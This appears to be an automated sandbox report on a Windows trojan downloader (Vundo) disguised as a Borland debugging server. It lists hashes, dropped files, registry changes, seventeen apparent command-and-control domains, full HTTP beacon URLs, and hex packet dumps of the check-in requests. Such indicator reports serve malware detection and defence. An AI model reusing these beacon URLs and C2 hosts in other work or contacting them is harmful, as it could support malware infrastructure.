Analysis Date2013-09-04 22:59:25
MD5ea1df7a9a54e37fac0ed7b559dd8c884
SHA1290beb77578863b54e97de67559103bd97a897af

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: c3f747cfcf0c2edc24b003c98bc0c138 sha1: 27554337c780524de20bffb69ccb79cb02bfb9f5 size: 90112
Section_ASM2 md5: 5f4a69444c6e72fc6aa3efc3d8e6287a sha1: b44b414de39af16b0625bad3f0e675e0e9ec2844 size: 62464
Section.rdata md5: 5be8eeb9fca386416f85ea22499ceea0 sha1: 727790a1b349b756866dec182b860ae1ac42c56c size: 7680
Section.data md5: 6f9a826e30a189988861376e1c542bc6 sha1: d0bf43f0fd3dfffaf87b0234c45eeb147ecd8f07 size: 5120
Section.tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.rsrc md5: 0700f6ce8a5c5f57f0abb43c0bfc0e28 sha1: 013ef4a4db6e77f6a2b3b73eb17e54ab68d4b788 size: 17920
Timestamp2012-09-18 22:06:08
VersionLegalCopyright: Copyright © Borland Software Corporation 1990, 2001
InternalName: BORDBG61
FileVersion: 70.08.08.1442
CompanyName: Borland Software Corporation
ProductName: Borland Remote Debugging Server
ProductVersion: 51.00
FileDescription: Borland Remote Debugging Server
OriginalFilename: bordbg61.exe
PackerMicrosoft Visual C++ ?.?
PEhash96d5eb0902d5e1a03adc8ac7b1a6d8be8e91e4b8
AVaviraTR/Vundo.Gen8
AVmsseTrojanDownloader:Win32/Vundo.J
AVavgGeneric29.BLEL

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-000000000046}\Enum\Implementing ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\NetCache\AdminPinStartTime ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021493-0000-0000-C000-000000000046}\Enum\Implementing ➝
NULL
RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\SysTray\Services ➝
31
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\system32\lzzatsb.dll
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process
Winsock DNS91.233.89.106
Winsock DNSclickbeta.ru
Winsock DNSdenadb.com
Winsock DNSterrans.su
Winsock DNSnsknock.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdenareclick.com
Winsock DNSgleospond.com
Winsock DNSfescheck.com
Winsock DNSinstrango.com
Winsock DNStegimode.com
Winsock DNSnetrovad.com
Winsock DNSnshouse1.com
Winsock DNSforadns.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ Pid 112

Network Details:

DNSgleospond.com
Type: A
91.220.35.154
DNSgetavodes.com
Type: A
91.220.35.154
DNStryatdns.com
Type: A
62.116.143.17
DNSfescheck.com
Type: A
62.116.143.17
DNSnsknock.com
Type: A
208.73.211.246
DNStegimode.com
Type: A
208.73.211.230
DNSdenadb.com
Type: A
208.73.211.247
DNSforadns.com
Type: A
208.73.211.230
DNSnshouse1.com
Type: A
208.73.211.246
DNSinstrango.com
Type: A
DNSnetrovad.com
Type: A
DNSterrans.su
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://gleospond.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzH1RiDEdEWX9
User-Agent:
HTTP GEThttp://getavodes.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzIXFcq9iIOQb
User-Agent:
HTTP GEThttp://tryatdns.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzEIyygjH+Ulj
User-Agent:
HTTP GEThttp://fescheck.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzPVuEOS5goIV
User-Agent:
HTTP GEThttp://nsknock.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzM0PV9W9M7zp
User-Agent:
HTTP GEThttp://tegimode.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzAXF1u7wkuSc
User-Agent:
HTTP GEThttp://denadb.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzAc1pBneP/1j
User-Agent:
HTTP GEThttp://foradns.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzDptgvqnzvKR
User-Agent:
HTTP GEThttp://nshouse1.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzMrPTK+shi8t
User-Agent:
HTTP GEThttp://91.233.89.106/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzHZIDV0j1A2H
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 91.220.35.154:80
Flows TCP192.168.1.1:1032 ➝ 91.220.35.154:80
Flows TCP192.168.1.1:1033 ➝ 62.116.143.17:80
Flows TCP192.168.1.1:1034 ➝ 62.116.143.17:80
Flows TCP192.168.1.1:1035 ➝ 208.73.211.246:80
Flows TCP192.168.1.1:1036 ➝ 208.73.211.230:80
Flows TCP192.168.1.1:1037 ➝ 208.73.211.247:80
Flows TCP192.168.1.1:1038 ➝ 208.73.211.230:80
Flows TCP192.168.1.1:1039 ➝ 208.73.211.246:80
Flows TCP192.168.1.1:1040 ➝ 91.233.89.106:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34333926   XX0000&key=1439&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 796e5373 734c6364 71697773   Wyg1ynSssLcdqiws
0x000000b0 (00176)   5566315a 54672b68 536b6738 63547971   Uf1ZTg+hSkg8cTyq
0x000000c0 (00192)   41547a48 31526944 45644557 58392048   ATzH1RiDEdEWX9 H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2067   TTP/1.1..Host: g
0x000000e0 (00224)   6c656f73 706f6e64 2e636f6d 0d0a0d0a   leospond.com....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34333926   XX0000&key=1439&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 796e5373 734c6364 71697773   Wyg1ynSssLcdqiws
0x000000b0 (00176)   5566315a 54672b68 536b6738 63547971   Uf1ZTg+hSkg8cTyq
0x000000c0 (00192)   41547a49 58466371 3969494f 51622048   ATzIXFcq9iIOQb H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2067   TTP/1.1..Host: g
0x000000e0 (00224)   65746176 6f646573 2e636f6d 0d0a0d0a   etavodes.com....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34333926   XX0000&key=1439&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 796e5373 734c6364 71697773   Wyg1ynSssLcdqiws
0x000000b0 (00176)   5566315a 54672b68 536b6738 63547971   Uf1ZTg+hSkg8cTyq
0x000000c0 (00192)   41547a45 49797967 6a482b55 6c6a2048   ATzEIyygjH+Ulj H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2074   TTP/1.1..Host: t
0x000000e0 (00224)   72796174 646e732e 636f6d0d 0a0d0a0a   ryatdns.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34333926   XX0000&key=1439&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 796e5373 734c6364 71697773   Wyg1ynSssLcdqiws
0x000000b0 (00176)   5566315a 54672b68 536b6738 63547971   Uf1ZTg+hSkg8cTyq
0x000000c0 (00192)   41547a50 5675454f 5335676f 49562048   ATzPVuEOS5goIV H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2066   TTP/1.1..Host: f
0x000000e0 (00224)   65736368 65636b2e 636f6d0d 0a0d0a0a   escheck.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34333926   XX0000&key=1439&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 796e5373 734c6364 71697773   Wyg1ynSssLcdqiws
0x000000b0 (00176)   5566315a 54672b68 536b6738 63547971   Uf1ZTg+hSkg8cTyq
0x000000c0 (00192)   41547a4d 30505639 57394d37 7a702048   ATzM0PV9W9M7zp H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a206e   TTP/1.1..Host: n
0x000000e0 (00224)   736b6e6f 636b2e63 6f6d0d0a 0d0a0a0a   sknock.com......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34333926   XX0000&key=1439&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 796e5373 734c6364 71697773   Wyg1ynSssLcdqiws
0x000000b0 (00176)   5566315a 54672b68 536b6738 63547971   Uf1ZTg+hSkg8cTyq
0x000000c0 (00192)   41547a41 58463175 37776b75 53632048   ATzAXF1u7wkuSc H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2074   TTP/1.1..Host: t
0x000000e0 (00224)   6567696d 6f64652e 636f6d0d 0a0d0a0a   egimode.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34333926   XX0000&key=1439&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 796e5373 734c6364 71697773   Wyg1ynSssLcdqiws
0x000000b0 (00176)   5566315a 54672b68 536b6738 63547971   Uf1ZTg+hSkg8cTyq
0x000000c0 (00192)   41547a41 63317042 6e65502f 316a2048   ATzAc1pBneP/1j H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2064   TTP/1.1..Host: d
0x000000e0 (00224)   656e6164 622e636f 6d0d0a0d 0a0d0a0a   enadb.com.......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34333926   XX0000&key=1439&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 796e5373 734c6364 71697773   Wyg1ynSssLcdqiws
0x000000b0 (00176)   5566315a 54672b68 536b6738 63547971   Uf1ZTg+hSkg8cTyq
0x000000c0 (00192)   41547a44 70746776 716e7a76 4b522048   ATzDptgvqnzvKR H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2066   TTP/1.1..Host: f
0x000000e0 (00224)   6f726164 6e732e63 6f6d0d0a 0d0a0a0a   oradns.com......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34333926   XX0000&key=1439&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 796e5373 734c6364 71697773   Wyg1ynSssLcdqiws
0x000000b0 (00176)   5566315a 54672b68 536b6738 63547971   Uf1ZTg+hSkg8cTyq
0x000000c0 (00192)   41547a4d 7250544b 2b736869 38742048   ATzMrPTK+shi8t H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a206e   TTP/1.1..Host: n
0x000000e0 (00224)   73686f75 7365312e 636f6d0d 0a0d0a0a   shouse1.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34333926   XX0000&key=1439&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 796e5373 734c6364 71697773   Wyg1ynSssLcdqiws
0x000000b0 (00176)   5566315a 54672b68 536b6738 63547971   Uf1ZTg+hSkg8cTyq
0x000000c0 (00192)   41547a48 5a494456 306a3141 32482048   ATzHZIDV0j1A2H H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2039   TTP/1.1..Host: 9
0x000000e0 (00224)   312e3233 332e3839 2e313036 0d0a0d0a   1.233.89.106....
0x000000f0 (00240)                                         


Strings